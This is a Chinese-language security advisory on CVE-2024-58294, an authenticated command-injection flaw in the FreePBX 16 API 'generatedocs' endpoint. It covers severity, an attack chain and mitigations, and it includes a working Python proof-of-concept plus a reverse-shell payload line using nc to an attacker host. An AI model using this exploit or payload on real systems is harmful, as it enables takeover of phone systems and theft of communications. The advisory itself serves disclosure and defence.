CVE-2024-58294 FreePBX 16 API模块认证后远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2024-58294

漏洞类型

远程代码执行(RCE)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

FreePBX 16

漏洞概述

CVE-2024-58294是FreePBX 16中存在的一个高危认证后远程代码执行漏洞，CVSS评分高达8.8分。该漏洞源于FreePBX的API模块对用户输入缺乏充分的过滤和验证，攻击者只需拥有低权限的有效会话凭证，即可利用API接口执行任意操作系统命令。FreePBX是一个基于Asterisk的开源PBX电话系统，广泛应用于企业通信和呼叫中心场景，因此该漏洞对使用FreePBX构建通信基础设施的组织构成严重威胁。攻击者通过构造特定的POST请求，可以绕过正常的API调用流程，在服务器上执行任意bash命令，进而可能完全控制整个电话系统，窃取敏感的通信数据，甚至将恶意代码持久化以进行长期渗透。鉴于该漏洞无需用户交互即可被利用，且可通过网络远程触发，建议受影响的组织立即采取修复措施。

技术细节

该漏洞存在于FreePBX 16的API模块中的'generatedocs'端点。攻击者利用此端点进行bash命令注入攻击。漏洞的技术原理如下：API模块在处理用户请求时，将用户可控的输入直接拼接到系统命令中执行，而未对特殊字符进行适当的过滤或转义。攻击者可以在POST请求的参数中注入分号、管道符等bash特殊字符，从而在服务器上执行任意命令。例如，攻击者可以构造类似';nc -e /bin/bash attacker.com 4444'的payload，通过反向shell获得服务器的交互式命令执行权限。攻击成功的关键前提是攻击者需要拥有有效的FreePBX会话凭证，但这些凭证可以通过多种途径获取，如暴力破解、社会工程学或利用其他低危漏洞。由于该漏洞影响的是API模块，任何能够访问API接口的已认证用户都可能成为潜在攻击者，因此建议对API访问进行严格的权限控制和审计。

攻击链分析

STEP 1

步骤1

获取FreePBX有效会话凭证：通过暴力破解、社会工程或其他漏洞获取低权限用户账号

STEP 2

步骤2

构造恶意POST请求：利用generatedocs端点，在module参数中注入bash命令payload

STEP 3

步骤3

命令注入执行：发送构造的请求，触发服务器执行注入的恶意命令

STEP 4

步骤4

建立远程shell：通过反弹shell或写入webshell获得持久化命令执行能力

STEP 5

步骤5

权限提升与横向移动：利用获得的访问权限进一步控制电话系统和内网资源

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2024-58294 PoC - FreePBX 16 API Authenticated RCE
# Target: FreePBX 16 API module 'generatedocs' endpoint

import requests
import sys

def exploit_freepbx(target_url, session_cookie, command):
    """
    Exploit the authenticated RCE vulnerability in FreePBX API module.
    Args:
        target_url: Base URL of FreePBX instance
        session_cookie: Valid session cookie (PHPSESSID)
        command: Command to execute on target
    """
    endpoint = f"{target_url}/admin/api/generatedocs"
    
    headers = {
        'Cookie': f'PHPSESSID={session_cookie}',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    # Inject command via 'module' parameter
    payload = f"module=;{command}"
    
    try:
        response = requests.post(endpoint, data=payload, headers=headers, timeout=10)
        return response.text
    except requests.RequestException as e:
        return f"Error: {str(e)}"

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python3 cve-2024-58294.py <target_url> <session_cookie> <command>")
        print("Example: python3 cve-2024-58294.py http://freepbx.local abc123hash 'id'")
        sys.exit(1)
    
    target = sys.argv[1]
    cookie = sys.argv[2]
    cmd = sys.argv[3]
    
    print(f"[*] Exploiting CVE-2024-58294 on {target}")
    print(f"[*] Executing command: {cmd}")
    result = exploit_freepbx(target, cookie, cmd)
    print(f"[+] Result:\n{result}")

影响范围

FreePBX 16

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 禁用或限制API模块的访问权限；2) 通过防火墙规则限制对/admin/api/路径的访问，仅允许可信IP；3) 监控和阻止包含特殊字符（如;、|、$、``）的可疑API请求；4) 定期审计用户会话和API调用日志，及时发现异常行为；5) 考虑暂时关闭generatedocs功能直到完成安全更新。